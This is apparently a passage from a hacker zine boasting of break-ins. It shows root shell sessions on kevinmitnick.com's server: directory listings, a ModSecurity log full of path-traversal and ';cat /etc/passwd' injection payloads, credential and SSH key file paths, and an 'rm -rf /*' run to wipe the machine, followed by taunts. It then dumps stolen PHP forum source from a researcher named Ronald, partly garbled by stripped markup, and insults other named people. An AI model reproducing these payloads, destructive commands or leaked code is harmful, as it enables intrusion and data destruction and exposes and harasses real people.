-rwxr-xr-x 1 mitsec mitsec 28169 Aug 7 2007 ssa.pdf -rwxr-xr-x 1 mitsec mitsec 2430 Aug 7 2007 style.css -rwxr-xr-x 1 mitsec mitsec 5731 May 18 17:28 testimonials.php drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 ttf -rwxr-xr-x 1 mitsec mitsec 2726 Oct 20 2007 verify_config.php -rwxr-xr-x 1 mitsec mitsec 3928 Mar 24 17:08 video.php -rwxr-xr-x 1 mitsec mitsec 5857 Aug 22 2006 wallofshame.txt -rwxr-xr-x 1 mitsec mitsec 3034 Aug 26 2007 workshop_signup.php -rwxr-xr-x 1 mitsec mitsec 20981 Nov 16 2006 workshop_signup.php.bk -rwxr-xr-x 1 mitsec mitsec 888 Aug 7 2007 workshop_signup_confirmation.php -rwxr-xr-x 1 mitsec mitsec 3305 Dec 7 2006 workshop_signup_new.php.bk -rwxr-xr-x 1 mitsec mitsec 5373 Nov 16 2006 workshop_signup_submit.php.bk -rwxr-xr-x 1 mitsec mitsec 1208 Aug 7 2007 workshops.php drwxr-xr-x 8 mitsec mitsec 4096 Sep 1 2008 zzhp root at dc21 [~]# cat wallofshame.txt Requesting IP Date Time Handler GET Host Mod_Security-Message Mod_Security-Action 167.216.252.40 2006-08-22 11:20:05 /images/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:20:03 cgi-script 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "xmlrpc" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:20:02 /phpxmlrpc/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "xmlrpc" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:20:01 /xmlrpc/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "xmlrpc" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:59 cgi-script /images/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:57 cgi-script /webmail/rwwwshell.pl HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "shell\\.pl" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:56 cgi-script /webmail/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:56 cgi-script /webmail/cgiforum.cgi?thesection=../../../../../../../etc/passwd%00 HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:55 cgi-script /webmail/cgiforum.pl?thesection=../../../../../../../etc/passwd%00 HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:54 cgi-script /webmail/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:52 /images/perl HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "perl " at THE_REQUEST 403 167.216.252.40 2006-08-22 11:19:49 cgi-script /webmail/.htaccess HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "\\.htaccess" at THE_REQUEST 403 167.216.252.40 2006-08-22 11:19:39 /phpMyAdmin-2.6.4/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "phpmyadmin" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:38 /phpMyAdmin-2.6.4-pl1/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "phpmyadmin" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:38 /phpMyAdmin264/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "phpmyadmin" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:36 cgi-script /images/rwwwshell.pl HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "shell\\.pl" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:35 cgi-script /images/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:35 cgi-script /images/cgiforum.cgi?thesection=../../../../../../../etc/passwd%00 HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:34 cgi-script /images/cgiforum.pl?thesection=../../../../../../../etc/passwd%00 HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:33 cgi-script /images/whois.cgi?action=load&whois=%3Bcat+%2Fetc%2Fpasswd HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:22 /nqt.php?portNum=80&queryType=all&target=someserver.com%3Bcat+/etc/passwd&Submi t=Do+It HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "/etc/passwd" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:20 /network_query.php?portNum=80&queryType=all&target=someserver.com%3Bcat+/etc/pa sswd&Submit=Do+It HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img src=javascript" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:18 /nph-cgiwrapd/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img src=javascript" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:18 /cgiwrapd/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img src=javascript" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:17 /cgiwrap/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "img src=javascript" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:16 /nph-cgiwrapd/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match " 403 167.216.252.40 2006-08-22 11:19:16 /cgiwrapd/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match " 403 167.216.252.40 2006-08-22 11:19:15 /cgiwrap/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match " 403 167.216.252.40 2006-08-22 11:19:04 /phpMyAdmin/css/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "phpmyadmin" at REQUEST_URI 403 167.216.252.40 2006-08-22 11:19:04 /phpmyadmin/css/ HTTP/1.1 9b.4d.344a.static.theplanet.com Access denied with code 403. Pattern match "phpmyadmin" at REQUEST_URI 403 root at dc21 [~]# #lolroot at dc21 [~]# cat config.php root at dc21 [~]# ls -la media/ ## we know u luv it k3v1n total 1292888 drwxr-xr-x 2 mitsec mitsec 4096 Jan 20 16:51 . drwxr-xr-x 24 mitsec nobody 4096 Jul 9 10:01 .. -rwxr-xr-x 1 mitsec mitsec 1780588 Jan 20 2006 2005 FBI Computer Crime Survey Report.pdf -rwxr-xr-x 1 mitsec mitsec 50950 Aug 7 2007 41stParamete2.pdf -rwxr-xr-x 1 mitsec mitsec 22324052 Jan 17 2005 60mins.wmv -rwxr-xr-x 1 mitsec mitsec 83791947 Feb 6 2008 AMW.mp4 -rwxr-xr-x 1 mitsec mitsec 67229236 Feb 8 2008 AMW.wmv -rwxr-xr-x 1 mitsec mitsec 115766 Jul 15 2006 AppSense-White-Paper-Mitnick.pdf -rwxr-xr-x 1 mitsec mitsec 46238 Aug 7 2007 Applied_Scan2.pdf -rwxr-xr-x 1 mitsec mitsec 99973354 Feb 6 2008 Bloomberg1.mp4 -rwxr-xr-x 1 mitsec mitsec 80357704 Feb 8 2008 Bloomberg1.wmv -rwxr-xr-x 1 mitsec mitsec 97313195 Feb 6 2008 Bloomberg2.mp4 -rwxr-xr-x 1 mitsec mitsec 78221632 Feb 8 2008 Bloomberg2.wmv -rwxr-xr-x 1 mitsec mitsec 97840298 Feb 6 2008 Bloomberg3.mp4 -rwxr-xr-x 1 mitsec mitsec 78549644 Feb 8 2008 Bloomberg3.wmv -rwxr-xr-x 1 mitsec mitsec 729350 Jul 24 2007 CSC-Testimonial.pdf -rwxr-xr-x 1 mitsec mitsec 60537 Jan 22 2005 HFSC-Testimony-20030403.pdf -rwxr-xr-x 1 mitsec mitsec 72885850 Jan 31 2008 InterviewWithMariFrank.mp3 -rwxr-xr-x 1 mitsec mitsec 211536 Jul 29 2007 Kevin_Mitnick_Bio_BW.pdf -rwxr-xr-x 1 mitsec mitsec 73025457 Nov 11 2005 MitnickDemo.wmv -rwxr-xr-x 1 mitsec mitsec 5659648 Jan 17 2005 Mitnick_Color.zip -rwxr-xr-x 1 mitsec mitsec 2547699 Jul 24 2007 Mitnick_Playboy_feature.pdf -rwxr-xr-x 1 mitsec mitsec 5144656 Jan 17 2005 Mitnick_bw.zip -rwxr-xr-x 1 mitsec mitsec 86455159 Feb 6 2008 Quest Interview.mp4 -rwxr-xr-x 1 mitsec mitsec 69397314 Feb 8 2008 Quest Interview.wmv -rwxr-xr-x 1 mitsec mitsec 72399 Jan 22 2005 SGAC-Testimony-20000302.pdf -rwxr-xr-x 1 mitsec mitsec 51160350 Feb 6 2008 Star Jones Interview.mp4 -rwxr-xr-x 1 mitsec mitsec 41092294 Feb 13 2008 Star Jones Interview.wmv -rwxr-xr-x 1 mitsec mitsec 41092294 Feb 8 2008 Star Jones.wmv -rwxr-xr-x 1 mitsec mitsec 18229 Dec 14 2005 THE ART OF INTRUSION_Press_Kit.zip -rwxr-xr-x 1 mitsec mitsec 718004 Mar 28 2005 The_Age.pdf -rwxr-xr-x 1 mitsec mitsec 33177621 Oct 20 2005 Trinidad.wmv -rwxr-xr-x 1 mitsec mitsec 117138 Mar 1 2008 US-pretrial.pdf -rwxr-xr-x 1 mitsec mitsec 50087 Jan 17 2005 aod_pk_v1-0.zip -rwxr-xr-x 1 mitsec mitsec 27561886 Jan 17 2005 artofdeceptionshort.wmv -rwxr-xr-x 1 mitsec mitsec 388671 Jan 20 16:51 cic-testimonial.pdf -rwxr-xr-x 1 mitsec mitsec 384144 Jul 24 2007 faa.pdf -rwxr-xr-x 1 mitsec mitsec 52 Jan 17 2005 index.php -rwxr-xr-x 1 mitsec mitsec 18794 Aug 10 2007 infragard.pdf -rwxr-xr-x 1 mitsec mitsec 1515582 Jul 24 2007 issa.jpg -rwxr-xr-x 1 mitsec mitsec 38559604 Apr 25 2005 mitnickpromo2.mov -rwxr-xr-x 1 mitsec mitsec 18084536 Mar 19 2007 mitnickpromo2.wmv -rwxr-xr-x 1 mitsec mitsec 32359 Jan 17 2005 msc_brochure.pdf -rwxr-xr-x 1 mitsec mitsec 46449 Jan 17 2005 msc_course_outline.pdf -rwxr-xr-x 1 mitsec mitsec 3948582 Aug 19 2007 pick-cards.mov -rwxr-xr-x 1 mitsec mitsec 40543570 Aug 19 2007 pick-cards.wmv -rwxr-xr-x 1 mitsec mitsec 28169 Jul 24 2007 ssa.pdf root at dc21 [~]# ls -la dev total 208 drwxr-xr-x 5 mitsec mitsec 4096 Sep 1 2008 . drwxr-xr-x 24 mitsec nobody 4096 Jul 9 10:01 .. -rwxr-xr-x 1 mitsec mitsec 123 Oct 20 2007 .htaccess -rwxr-xr-x 1 mitsec mitsec 1038 Oct 20 2007 _contact_settings.php -rwxr-xr-x 1 mitsec mitsec 528 Aug 1 2007 _footer.php -rwxr-xr-x 1 mitsec mitsec 3121 Aug 1 2007 _header.php -rwxr-xr-x 1 mitsec mitsec 11023 Aug 7 2007 _sidebar.php -rwxr-xr-x 1 mitsec mitsec 2798 Jul 24 2007 aoi_reviews.php drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 cache -rwxr-xr-x 1 mitsec mitsec 2870 Jul 23 2007 company.php -rwxr-xr-x 1 mitsec mitsec 1778 Jul 29 2007 contact.php -rwxr-xr-x 1 mitsec mitsec 1054 Jul 24 2007 contact_confirmation.php -rwxr-xr-x 1 mitsec mitsec 50245 Jul 24 2007 contact_form.php -rwxr-xr-x 1 mitsec mitsec 2839 Jul 24 2007 error_log drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 images -rwxr-xr-x 1 mitsec mitsec 3627 Aug 7 2007 index.php -rwxr-xr-x 1 mitsec mitsec 1440 Jul 23 2007 investigations.php -rwxr-xr-x 1 mitsec mitsec 8793 Jul 24 2007 lastRSS.php -rwxr-xr-x 1 mitsec mitsec 7120 Jul 23 2007 presentations.php -rwxr-xr-x 1 mitsec mitsec 4991 Jul 29 2007 press.php -rwxr-xr-x 1 mitsec mitsec 3111 Jul 23 2007 products.php -rwxr-xr-x 1 mitsec mitsec 1738 Jul 23 2007 resources.php -rwxr-xr-x 1 mitsec mitsec 8172 Jul 29 2007 services.php -rwxr-xr-x 1 mitsec mitsec 5225 Aug 1 2007 speaking.php -rwxr-xr-x 1 mitsec mitsec 2430 Jul 24 2007 style.css -rwxr-xr-x 1 mitsec mitsec 2043 Aug 7 2007 testimonials.php -rwxr-xr-x 1 mitsec mitsec 1981 Jul 24 2007 video.php -rwxr-xr-x 1 mitsec mitsec 3036 Jul 29 2007 workshop_signup.php -rwxr-xr-x 1 mitsec mitsec 888 Jul 24 2007 workshop_signup_confirmation.php -rwxr-xr-x 1 mitsec mitsec 1208 Jul 23 2007 workshops.php drwxr-xr-x 8 mitsec mitsec 4096 Sep 1 2008 zzhp root at dc21 [~]# cat dev/.htaccess AuthType Basic AuthName "Restricted Area" AuthUserFile "/home/mitsec/.htpasswds/public_html/dev/passwd" require valid-user root at dc21 [~]# cat /home/mitsec/.htpasswds/public_html/dev/passwd root at dc21 [~]# cat dev/index.php Mitnick Security Consulting, LLC is a full-service information security consulting firm. Founded by Kevin Mitnick, Mitnick Security Consulting offers a comprehensive range of services to help businesses protect their valuable assets. Mitnick Security Consulting, LLC is a full-service information security consulting firm. Founded by Kevin Mitnick, Mitnick Security Consulting offers a comprehensive range of services. read more >>
FBI Computer Crime Survey
“This computer security survey eclipses any other that I have ever seen. After reading it, everyone should realize the importance of establishing a proactive information security program.” - Kevin Mitnick
Click Here To Download The Report

"Mitnick left his audience shaken,but better equipped to stave off attacks via social engineering."
- Computer Sciences Corporation (Click Here for PDF)

"It's both frightening and informative to hear how effective social engineering can be in assessing what should be security sensitive information."
- Scott Pettit - The AIM Institute (Click Here for PDF)
Read more testimonials >>

2007 Las Vegas Social Engineering Workshop
A two-day course covering:
- Social engineering case studies, attack methods, vulnerabilities in the human firewall, and techniques to protect your business
- Security policies development, follow-through, assessment, and training

Sign up now >>

The Art of Intrusion:
The Real Stories Behind the Exploits of Hackers, Intruders, and Deceivers

[ More Information ]
[ Read The Press Reviews ]
The Art of Deception:
Controlling the Human Element of Security

[ More Information ]
root at dc21 [~]# ls -la /home/mitsec/.ssh/ total 16 drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 . drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 .. -rwxr-xr-x 1 mitsec mitsec 0 Nov 15 2008 authorized_keys -rwxr-xr-x 1 mitsec mitsec 0 Nov 15 2008 authorized_keys2 -rwxr-xr-x 1 mitsec mitsec 744 Oct 20 2007 id_dsa -rwxr-xr-x 1 mitsec mitsec 615 Oct 20 2007 id_dsa.pub -rwxr-xr-x 1 mitsec mitsec 0 Nov 15 2008 known_hosts toproot at dc21 [~]# cat /etc/userdomains kevinmitnick.com: mitsec defthi.com: mitsec defthi.mitnicksecurity.com: mitsec mitnicksecurity.com: mitsec mitsec.com: mitsec defensivethinking.com: mitsec *: nobody root at dc21 [~]# #good bye kevin root at dc21 [~]# rm -rf /* /dev/rm2: cannot remove `/dev/pts/0': Operation not permitted [ snip ] root at dc21 [/dev]# logout Connection to www.kevinmitnick.com closed by remote host. Connection to www.kevinmitnick.com closed. Apologies for the poor quality of the hacklog, but I'm old now and let's face it, Kevin Mitnick is done. You can move your box anywhere Kevin, we'll find you and own you. You should know best, it's the "hacker" in us - or something like that...See you soon. | \ / _\/_ 0x000000/rvdh .-'-. //o\ _\/_ -- / \ -- | /o\\ ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~` I'm out of my head | That was what they said There was no way that I would Ever trust again As far as whitehats go Ronald is a pretty nice guy. Sometimes you find yourself respecting a guy for the way he goes about his shit, Ronald is that kinda guy. The comparison with the no talent asshat rsnake is obvious - both "specialize" in this new form of security - "WEB APPLICATION SECURITY". Ronald was never about the money, whereas rsnake is all about the hype, the drama, and seeing his name in lights. Ronald quit the security scene some time ago, and despite creating a new site it has been idle for a long time. So rather than let this information go to waste, I figured I would share the security secrets of his CMS/blog. Let's start with his index.php. I hope no one hosts this zine with a .php extension, they'd be as owned as Ronald. ]*?>(.|\n)*?<\/pre>/", $string, $pre1); for ($x = 0; $x < count($pre1[0]); $x++) { $pre2[$x] = preg_replace("/\s*]*?>\s*/", "\r\n", $pre1[0][$x]); $pre1[0][$x] = "/".preg_quote($pre1[0][$x], "/")."/"; } return preg_replace($pre1[0], $pre2, $string); } ?> 0x000000 Hacking & Security, cuz Web 2.0 is kitsch

rvdh

Hacking & Security







free websecurity scanner
$ head -n 50 x/processor.php function show(value) { document.getElementById('img').innerHTML = ''; } [$3]

", "

$3

", "

$1

", "

''.encode('$1').''

", "$1", "$1", "$1", "$1", "
$1
", "
", "
$1
", "$1", "$1", ); $new = preg_replace($search , $replace, $string); return $new; } function rplace($data) { $data = BBcode($data); $data = str_replace('8(',' ',$data); $data = str_replace('8)',' ',$data); $data = str_replace('8p',' ',$data); $data = str_replace('8s',' ',$data); $data = str_replace('-cool',' ',$data); $data = str_replace('-ehm',' ',$data); $data = str_replace('-emo(',' ',$data); $data = str_replace('-evil',' ',$data); $data = str_replace('-fu',' ',$data); $data = str_replace('-good',' ',$data); $data = str_replace('-orly;)',' ',$data); $data = str_replace('-ok',' ',$data); return $data; } function wrap($datas) { $buffer = 33; $break = ' '; $wrapped = false; $aa = array('/<script>/','/<\/script>/','/%3E%3Cscript/'); $bb = array(' <script>',' </script>',' %3E%3Cscript'); $data = preg_replace($aa,$bb,$datas); $tmp = explode(' ', $data); foreach($tmp as $word) { while($w = $word[$buffer++]) { $strbf = $w; } if(preg_match("/(0) { session_start(); $_SESSION['login'] = 1; while($m=mysql_fetch_array($sql)) { $username = encode($m['user']); ?> |<|\'|\"|\-|\+|\$|\`|;|{|}|system|php|&#|java|xss|%3C|%3E|minutemaid| cookie|alert|string)/i", $val)){ $img = false; } else { $img = (eregi("^([a-zA-Z].*|[1-9].*)\.(((j|J)(p|P)(g|G))|((g|G)(i|I)(f|F)))$", $val)) ? true:false; } if($img === false) { $img = 'hacked.gif'; } if (file_exists('avatars/'.escapeshellcmd($img))) { return escapeshellcmd($img); } else { return 'hacked.gif'; } } # uniqueid function unique(){ $u = uniqid(mt_rand(0,65350),(int)str_replace('.','',$_SERVER['REMOTE_ADDR']).mt_ran d(0,65350)); for($i=0;$i<15;$i++) { $tmp = $u[$i]; $uid .= $tmp; } return substr(md5($uid),0,7); } function hex($str) { if (trim($str)!="") { $hex=""; $length=strlen($str); for ($i=0; $i<$length; $i++) { if ($i>0) $bound=":"; else $bound=""; $hex.=$bound.str_pad(dechex(ord($str[$i])), 2, 0, STR_PAD_LEFT); } return $hex; } } if($_REQUEST['members'] && $_SESSION['login'] && $_COOKIE['guid'] && $_COOKIE['forum']) { ?> |<|\'|\"|java|xss|%3C|%3E)/i", $avx)){ $av = 'hacked.gif'; }elseif (file_exists('avatars/'.escapeshellcmd($c['avatar']))) { $av = $c['avatar']; } else { $av = 'hacked.gif'; } echo ($i % 2) ? "" : ""; ?>
Avatar Nickname Company Website
"; } else { echo ""; } ?>
Settings
Name:
Company:
E-mail:
Website:
Signature:
Avatar:
 
0 ) { while($m=mysql_fetch_array($sql)) { $sql = mysql_query("update users set name = '".prepare(encode($_REQUEST['name']),150,true,false,true)."', company = '".prepare(encode($_REQUEST['company']),150,true,false,true)."', email = '".prepare(encode($_REQUEST['email']),150,true,false,true)."', link = '".prepare(encode($_REQUEST['website']),40,true,false,true)."', avatar = '".prepare(encode($_REQUEST['avatar']),150,true,false,true)."', sig = '".prepare(encode($_REQUEST['sig']),250,true,false,true)."' where id = '".$m['id']."'"); echo "
Updated!


"; } } } else { echo "(!) No image, probably a wrong file format.

";} } if($_REQUEST['newtopic'] && $_SESSION['login']) { if($_SESSION['login']) { $item = explode('|',$_REQUEST['newtopic']); $id = (int) $item[1]; ?>
New topic

 
bbcode: [url=url]text[/url] - [b][/b] [i][/i] [u][/u] [s][/s] [hr] [code][/code] [sub][/sub]




(!) please login to post a new topic.
"; } } if($_REQUEST['topic'] && $_REQUEST['name'] && $_REQUEST['posting'] && $_COOKIE['guid']) { $item = explode('|',$_REQUEST['topic']); $id = (int) $item[1]; $name = $_REQUEST['name']; $post = $_REQUEST['posting']; $run = explode(',',$_COOKIE['guid']); $p = prepare($run[2],250,true,false,true); $u = prepare($run[1],150,true,false,true); $sql = mysql_query("select * from users where user = '".$u."' and pass = '".$p."'"); if(mysql_num_rows($sql) >0) { session_start(); $_SESSION['login'] = 1; while($m=mysql_fetch_array($sql)) { $username = encode($m['user']); $uid = (int) $m['id']; flood2($id,$uid); } $sqlo = mysql_query("insert into topics set catid = '".$id."', name = '".prepare(encode($name),100,true,false,true)."', post = '".prepare(encode($post),5001,true,false,true)."', uid = '".$uid."', user = '".$username."', time = '". date("F j, Y, g:i a",time()) ."', timer = '".time()."'") or die(); $num = mysql_query("select * from topics"); $last = mysql_num_rows($num); $nn = "|".$last.":".$id; $s = mysql_query("update users set unreadtopic = CONCAT(unreadtopic,'".$nn."') "); echo "
Posted! return to the forum click here


"; } else { echo 'error'; } } if($_REQUEST['logout'] && $_COOKIE['guid'] && $_COOKIE['forum']) { setcookie('forum','',1); setcookie('guid','',1); session_destroy(); echo "

You are logged out, go to forum


"; header("location:index.php?!=1"); exit; } if($_REQUEST['markread'] && $_COOKIE['guid'] && $_COOKIE['forum']) { $dats = explode(',',$_COOKIE['guid']); $sql = mysql_query("update users set unreadtopic = '0:0' where user = '".prepare($dats[1],150,true,false,true)."' and pass = '".prepare($dats[2],250,true,false,true)."' limit 1"); echo "

All messages are marked.


"; header("location:index.php?!=1"); exit; } $cookie = $_COOKIE['forum']; $key = $_SESSION['forum']; $body = $_REQUEST['reply']; $post = $_REQUEST['post']; # check behaviour. if($key && $cookie && $body && $post && $_REQUEST['!']==1) { if($key !== $cookie) { echo "
Session error, quit trying and abort.
"; setcookie('forum','',1); session_destroy(); exit; } elseif(preg_match("/(poker|blackjack|viagra|adult|dating|singles|v1agra|erotic| pills|levitra|lolita|phentermine|zyban|valtex|xenical|adipex|celebrex|diflucan| norvasc|pharmacy|drugstore|meridia|cunt|mortgage|credit|loan|finance|cash|boob| enlarge|insurance|debt|casino|prozac|zoloft|masculine|xanax|valium|hydrocodone| vicodin|paxil|vioxx)/i", $body)){ echo "
(!) Message contains probably SPAM, please review and correct.


"; setcookie('forum','',1); session_destroy(); exit; } elseif(strlen($body) > 5000) { echo "
(!) Message is too large, maxlength is 5000 chars!


"; } else { $pid = explode('|',$_REQUEST['post']); $id = (int)$pid[1]; $sid = (int)$pid[2]; $dats = explode(',',$_COOKIE['guid']); if(!$dats[1]) { echo '
(!) Cookie problem, please logout and re-login to fix this issue.


'; exit; } $sql2 = mysql_query("select * from users where user = '".prepare($dats[1],150,true,false,true)."' and pass = '".prepare($dats[2],250,true,false,true)."' limit 1"); if(mysql_num_rows($sql2) >0 ) { while($y = mysql_fetch_array($sql2)) { flood($sid,$y['id']); $sqlp = mysql_query("update topics set posts = (posts +1) , lastuser = '".$y['user']."' where id = '".$id."'"); $sqln = mysql_query("insert into posts set catid = '".$id."', userid = '".$y['id']."', post = '".prepare(encode($body),5001,true,false,true)."', time = '". date("F j, Y, g:i a",time()) ."', ip = '".encode($_SERVER['REMOTE_ADDR'])."', sid = '".$sid."', timer = '".time()."'"); $num2 = mysql_query("select * from posts"); $last2 = mysql_num_rows($num2); $nn = '|'.$id.':'.$sid; $f = mysql_query("update users set unreadtopic = CONCAT(unreadtopic,'".$nn."')"); echo "
Message posted!


"; check(); header("location:index.php?!=1&read=".$id.'|'.$sid.""); setcookie('forum','',1); exit; } } else { echo "
(!) Auth problem, are you a member? please re-login to fix it.


"; setcookie('forum','',1); setcookie('guid','',1); header("location:index.php?!=1"); session_destroy(); exit; } } } $_SESSION['forum'] = crypt(sha1(hex(unique()))); ?>
(!) Only a-z-0-9 chars as username
"; exit; } $p = prepare($_REQUEST['pass'],250,true,false,true); $u = prepare($_REQUEST['user'],150,true,false,true); $sql = mysql_query("select * from users where user = '".$u."' and pass = '".sha1($p)."'"); if(mysql_num_rows($sql) >0) { session_start(); $_SESSION['login'] = 1; while($m=mysql_fetch_array($sql)) { $_SESSION['username'] = encode($m['user']); ?>
(!) continue to forum, click here.
"; } else { echo '
(!) Ooooops! I guess that login doesn\'t work.


'; } } elseif($_REQUEST['f']) { $cid = explode('|',$_REQUEST['f'],7); $id = (int) $cid[1]; if($_SESSION['login']) { ?>

« back to forum list

(new)'; } else { $new = ""; } } ?>
Subject Posts By Last Post
« back to forum list

|<|\'|\"|java|xss|%3C|%3E)/i", $avz)){ $av = 'hacked.gif'; } elseif (file_exists('avatars/'.escapeshellcmd($avz))) { $av = $avz; } else { $av = 'hacked.gif'; } ?> |<|\'|\"|java|xss|%3C|%3E)/i", $avz)){ $av = 'hacked.gif'; } elseif (file_exists('avatars/'.$avx)) { $av = $avz; } else { $av = 'hacked.gif'; } ?>

Started by: on:
"; } else { echo ""; } ?>
'. rplace(stripslashes($dz)) .'
'; } ?>

"; } else { echo ""; } ?>
on:
'. rplace(stripslashes($dz)) .'
'; } ?>

Reply
bbcode: [url=url]text[/url] - [b][/b] [i][/i] [u][/u] [s][/s] [hr] [code][/code] [sub][/sub]


(!) please login to post.
"; } } else { function NT($num) { $sql = mysql_query("select * from topics where catid = '".$num."'"); return mysql_num_rows($sql); } function PT($num) { $sql = mysql_query("select * from posts where sid = '".$num."'"); if(mysql_num_rows($sql) >0) { $cf = (mysql_num_rows($sql) + 1); } else { $cf = '0'; } return $cf; } function posts($num) { $n = ':'.$num; $sqlx = mysql_query("select * from users where unreadtopic LIKE '%".$n."' and user = '".$_SESSION['username']."'"); while($a= mysql_fetch_array($sqlx)){ echo '(new)'; } } # init session $_SESSION['gid'] = hex(unique()); $guid = $_SESSION['gid']; ?>

FORUM
Threads Posts

General hacking
Everything that applies to hacking
News
Important news about hacking or security.
Webapplication hacking
Everything webapplication, hacking websites, apps and more...
Network hacking
Strictly hardcore network.
SQL Injection
Vectors, questions and answers about SQL injection.
XSS
Vectors, questions and answers about cross site scripting.
CSRF
Unauthorized requests, CSRF, and general sea surfing.
Browser hacking
Hacking browsers, destroying browsers, and other browser mayhem.
Lifestyle
The hacker lifestyle, mind hacking, the way of life.
Software hacking
Got some cool software hacks? post them here.
Hardware hacking
We hack, hack, hack. So also computers, and other property.
Chillin
Just chill and relax a bit...
Tutorials
Posted tutorials, links to them and Q & A
Trashbin
Rubbish and spam.

Casual file listing... -rwx------ 1 ronald ronald 2629 2009-01-23 17:21 125x125freexssa.gif -rwx------ 1 ronald ronald 2250 2009-01-23 17:21 1338.gif -rwx------ 1 ronald ronald 1645 2009-01-23 17:22 about.php -rwx------ 1 ronald ronald 4374 2009-01-23 17:22 archive.php -rwx------ 1 ronald ronald 4849 2009-01-23 17:21 arioso.js -rwx------ 1 ronald ronald 15616 2009-01-23 17:21 ascii.html drwx------ 2 ronald ronald 65536 2009-01-23 17:22 avatars drwx------ 2 ronald ronald 8192 2009-01-23 17:22 cache -rwx------ 1 ronald ronald 3957 2009-01-23 17:21 cap.php -rwx------ 1 ronald ronald 561 2009-01-23 17:22 contact.php drwx------ 2 ronald ronald 8192 2009-01-23 17:21 css -rwx------ 1 ronald ronald 209 2009-01-23 17:21 dx.php -rwx------ 1 ronald ronald 2515 2009-01-23 17:21 err.php -rwx------ 1 ronald ronald 118 2009-01-23 17:21 favicon.ico -rwx------ 1 ronald ronald 197 2009-01-23 17:21 fav.php -rwx------ 1 ronald ronald 34228 2009-01-23 17:21 forumasas.php -rwx------ 1 ronald ronald 7988 2009-01-23 17:21 fuzzy_overdrive.txt -rwx------ 1 ronald ronald 712 2009-01-23 17:21 google.php -rwx------ 1 ronald ronald 4889 2009-01-23 17:21 Hostscanner.phps -rwx------ 1 ronald ronald 1513 2009-01-23 17:21 .htaccess -rwx------ 1 ronald ronald 1412557 2009-01-23 17:21 icon.txt drwx------ 3 ronald ronald 16384 2009-01-23 17:22 images drwx------ 2 ronald ronald 8192 2009-01-23 17:22 include -rwx------ 1 ronald ronald 5739 2009-01-23 17:21 index2sssdsdw.php -rwx------ 1 ronald ronald 4194 2009-01-23 17:21 